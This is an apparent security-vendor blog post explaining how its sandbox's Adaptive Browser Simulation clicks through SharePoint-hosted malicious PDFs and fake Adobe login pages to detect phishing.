Engineers have put a lot of work into making today’s websites effortless to browse. When we browse the web, we typically reach the function of a website we want without ever thinking about what we need to click. Websites present their options clearly, and even call us to do various actions with big buttons: sign up, log in, accept cookies, share, learn more. We are already used to website interfaces having their own opinion, and guiding us towards where they want us to go.
For an attacker, this trend is lucky. It doesn’t stand out that a phishing website is asking us to sign in with our credentials, we see this prompt all the time from clean websites. The attacker can also misuse or mimic legitimate web services instead of making their own. These services present the victim with professionally created, familiar interfaces which are easy to navigate without a second thought… exactly what the attacker wants.
For a defender, the same trend can be a challenge. The interface of websites is meticulously crafted to make it effortless to browse for humans — but not for automation such as security products. A person would instinctively know which button to press without ever thinking about it, but for software, it’s often hard to decide what a human would do. If the sandbox fails to simulate the victim’s behavior, then the collected data during analysis becomes less accurate, which can lead to false verdicts.
In this feature highlight blog post, we discuss VMRay’s approach for solving the problem with Adaptive Browser Simulation. In the context of malicious websites requiring interaction, we can differentiate two categories: websites misusing or copying legitimate services, and websites implementing their own interfaces. We’ll show an example for each, and how Adaptive Browser Simulation can handle them.
Attackers often attempt to misuse well-known legitimate services for hosting malware, such as Dropbox, Google Drive, or OneDrive. Hosting malware on these services is temporary since the providers of these services actively look for malware and remove them. However, the time the malware stays online might be all the time the attacker needs, and during this time they can reap the unique benefits of such file hosting services: they are free, provide legitimate-looking URLs that people often click, and a user experience that is familiar to the victim.
Attackers also don’t have to link files directly, making them harder to scan for security solutions. Well-known file-hosting services typically want users to visit their website before serving them the file, and they expect people to use their built-in document reader or click a button to download the file instead of linking it directly.
VMRay’s Adaptive Browser Simulation solves this by recognizing the service, finding the download URL, downloading the file, and submitting it for a second dynamic analysis.
Example: Malware sent via Sharepoint
The relevant part of the attack starts with a Sharepoint URL. When the victim opens the URL, they are presented with a PDF file in an online PDF viewer. The PDF uses a social engineering technique that’s common for document malware: it contains a blurred image and on top of it a fake error message. The message suggests clicking a link, which would finally lead the victim to a malicious website.
So the stages of the attack are as follows:
Figure 1: Sharepoint’s user interface showing a PDF that contains a malicious URL
A security product needs to peel back the layers: access the Sharepoint site, then reach the PDF, then find the malicious URL inside the PDF.
When this Sharepoint URL is submitted to VMRay for dynamic analysis, the Adaptive Browser Simulation feature understands that this is not just any website, but a file hosted on Sharepoint. It finds a way to download the file, then submits the downloaded PDF for an in-depth analysis. The second analysis extracts the malicious URL from the PDF sample and marks the PDF sample as malicious.
Figure 2: VMRay Analyzer sample page showing the Web Analysis of the Sharepoint URL on top, and the automatically downloaded PDF as a child sample at the bottom
In VMRay, the URL and the PDF are represented as two different samples with a relation between them. The downloaded PDF is the child of the URL it was downloaded from. Since the downloaded file was marked malicious, the URL sample it was downloaded from is also marked as malicious.
Figure 3: VMRay Analyzer sample page of Sharepoint URL with Malicious verdict reached based on the child sample’s malicious verdict
Automating user interaction for known services is easy compared to websites which use a custom interface. Supporting these custom interfaces is constant work, where reaction time to new phishing kits is crucial. With the VMRay Platform’s v4.3 release, VMRay Labs is able to distribute new browser simulation algorithms within regular Signature and Detection updates. This makes it possible for VMRay Labs to quickly react to new phishing interfaces even for on-premises customers, significantly shortening the attacker’s window of opportunity.
Example: A phishing page that needs a button click to show the login screen
Sometimes attackers like to let the victim have a choice, such as presenting a screen where the victim can pick a service to log in with. This is because the attacker often doesn’t know which services the potential victim uses, it makes sense for the attack to cover as many as possible. With the phishing website in this example, the victim needs to click one of the buttons to reach a login form. Submitting the form sends the credentials to the attacker.
In terms of social engineering methods, this sample is similar to the previous one: to the user, it looks like a PDF, and to view it they need to press something, then enter credentials. However, here there is no real PDF, it’s just a website with a picture and some buttons on top of it. The Adobe warning is fake, clicking the button leads the user to a login form.
Figure 4: (Left) phishing webpage with fake Adobe login screen. (Right) legitimate Adobe login screen
With the help of Adaptive Browser Simulation, VMRay finds the “Sign in with Outlook” button, clicks it, and successfully reaches the login form. This provides the defender with more information, and the additional data is often used for more precise phishing detection.
Attackers continuously come up with new, often convincing web interfaces that trick people into providing their credentials. With the Adaptive Browser Simulation feature, VMRay can quickly react, and automatically detect threats that would otherwise require human interaction to reach.